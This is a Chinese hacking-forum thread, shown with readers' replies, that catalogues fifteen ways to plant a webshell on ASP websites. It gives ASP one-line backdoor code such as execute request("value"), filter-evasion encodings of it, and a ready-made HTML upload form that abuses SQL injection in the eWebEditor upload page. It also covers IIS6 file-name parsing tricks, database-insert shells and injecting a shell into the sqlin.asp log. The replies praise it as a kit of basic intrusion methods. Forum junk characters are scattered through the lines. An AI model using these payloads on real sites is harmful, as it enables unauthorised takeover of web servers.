返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式+ e+ [* s/ S1 w0 k3 D' o

# y6 B, s) `. N0 T9 u1 `3 G  ~2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
/ b1 l( k& f' w  g, C- Q$ i+ V; r: I. Q/ Y: W# ^
3.上传漏洞:& y4 P/ n% S! }3 M

, [* Q8 _9 N8 c! X# w动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x006 l* z( ^/ k# h# o& L, {  l

3 Q6 I$ U& E/ I* h逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件1 F8 F% t- _  @2 R* X
  b! R6 f* K6 A* k& ?5 z
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp0 d1 h; K  @3 w- u* Z1 I  M
然后在上传文件里面填要传的图片格式的ASP木马
* g( t9 \  v1 A  W就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
0 r# C7 F6 v3 B& H. n4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传- u; a0 l2 U% N* M4 O1 U
7 c8 Z8 P. g  G* X- T4 w& S4 u
<html>
. N# A0 y& b0 K  i, O, ~, X$ [<head>5 A; c9 j+ q& H2 @5 Y5 U
<title>ewebeditor upload.asp上传利用</title>
1 H/ F5 z6 n2 U. P7 m: B</head>
, U4 W3 E: |) E" w0 B. C; Q<body>: K# f% M9 h, w  x2 Y/ E7 w- l0 R
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">$ H( k0 }0 z9 B
<input type=file name=uploadfile size=100><br><br>6 e0 c* I$ c' o! @0 k
<input type=submit value=Fuck>
6 y0 O$ O: E% U8 N- L- P- O) a2 w</form>/ O# C  t1 S& v; i$ B: [- p' Y" T
</body>3 Y4 m% }6 D4 P# I" I/ q
</form>
2 a. y6 _  p# G# R9 ^</html>
7 z$ Q2 X! a! G  s' x' v$ o7 D5 A* r. k) P7 Q6 I. R
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
, S( t1 T1 w" V! w) @. z5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
( v7 l5 T. d0 d) ^6 X$ W# R( a9 S; G- C" H. L" e+ u5 U$ t
利用windows2003解析。建立zjq.asp的文件夹$ t( V# ?# w1 i( H
- K. x: {" n( h) ^
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
4 ?1 T* B1 m* S1 v8 L& d6 i
% Y" n3 k( o% B* _  x+ K2 l7.cuteeditor:类似ewebeditor* W; t0 s, O, w& I
% J* ^3 I- u1 m- m# m
8.htmleditor:同上% `4 H- ?: m3 C" S

0 w$ i) L) I! P9 }* Q9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破6 n, T" ]8 Z4 c3 o! e

/ H" Q# s4 P* |3 p, U; x2 S<%execute request("value")%><%'<% loop <%:%>
( d2 W  g* b7 u/ }' i+ ^! W& ]2 h
<%'<% loop <%:%><%execute request("value")%>
9 x) q, N' H1 A2 L* d0 N
8 `# M2 }' K  i$ s8 U1 M% A7 m: ^, w<%execute request("value")'<% loop <%:%>. I) V" R5 |% Z) I% E9 E  d  T
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞! J1 A! T  q( b  o  L' b
: z7 q+ S. C. o0 a  ^; I& ~; {  {, K
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
$ ^1 @; {! v( x6 }! U$ n# H5 u: q7 k
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3# G5 n5 I* E" B5 V+ F0 L4 V1 Z/ P
! q6 |* J6 e! U6 a3 `
解析漏洞得到webshell: _9 f* ~1 k! f: T4 m# z" D
& q% Y0 W/ i6 X7 S. E
12.mssql差异备份,日志备份,前提需知道web路径
4 d6 e7 z$ s/ z5 K. U3 g
3 Y% {3 }0 R0 N13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell  ?1 ^$ U, L' _" M& [, C; j

& m2 J6 d# q- m% f/ v' T14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell* p  p7 I$ c4 l& P
4 G# w) m$ Y; R4 F5 r& ~. [5 o
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可# A9 U8 [1 J; v, ?* _9 X

! D( r: e3 f6 p, @1 f" q: A- T以上只是本人的一些拙见,并不完善,以后想到了再继续添加  h( U- M3 G0 z$ |) y* B7 }
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 : ?9 H% L% b, \; b6 @. J* z

! w4 G$ s; M/ y2 t. h0 {& C1 M+ c9 j7 f6 q- a; y
很好啊、基本的入侵方法都包含了
0 q& g% a& c4 Q0 s5 a- N- t: ^9 `
/ ]( p5 w% `2 a5 i7 \8 h( F最好来个提权的帖子再。
( U  n! F4 _& e1 E# ^- q" T/ ^% D) h; Z
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表